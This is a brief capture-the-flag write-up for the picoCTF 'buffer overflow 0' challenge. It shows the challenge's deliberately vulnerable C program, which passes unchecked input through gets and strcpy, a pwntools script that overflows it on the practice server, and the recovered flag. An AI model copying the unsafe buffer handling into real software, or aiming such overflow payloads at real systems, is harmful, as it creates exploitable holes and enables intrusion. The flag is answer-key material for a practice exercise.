buffer overflow 0
*  
binary  
picoctf

Let's start off simple, can you overflow the correct buffer?

Two files are given:
binary vuln
and vuln.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

void sigsegv_handler(int sig) {
printf("%s\n", flag);
fflush(stdout);
exit(1);
}

void vuln(char *input){
char buf2[16];
strcpy(buf2, input);
}

int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler); // Set up signal handler
gid_t gid = getegid();
setresgid(gid, gid, gid);


printf("Input: ");
fflush(stdout);
char buf1[100];
gets(buf1);
vuln(buf1);
printf("The program will exit now\n");
return 0;
}

In order to get the flag a buffer overflow is needed.
def rem():
r = remote("saturn.picoctf.net",61338)
print(r.recvuntil("Input: "))
payload = b'A' * 101
r.sendline(payload)
print(r.recvline())


$ python3 script.py
[+] Opening connection to saturn.picoctf.net on port 61338: Done
/home/cheepsss/Documents/buffer overflow 0/script.py:15: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
print(r.recvuntil("Input: "))
b'Input: '
b'picoCTF{ov3rfl0ws_ar3nt_that_bad_9f2364bc}\n
picoCTF{ov3rfl0ws_ar3nt_that_bad_9f2364bc}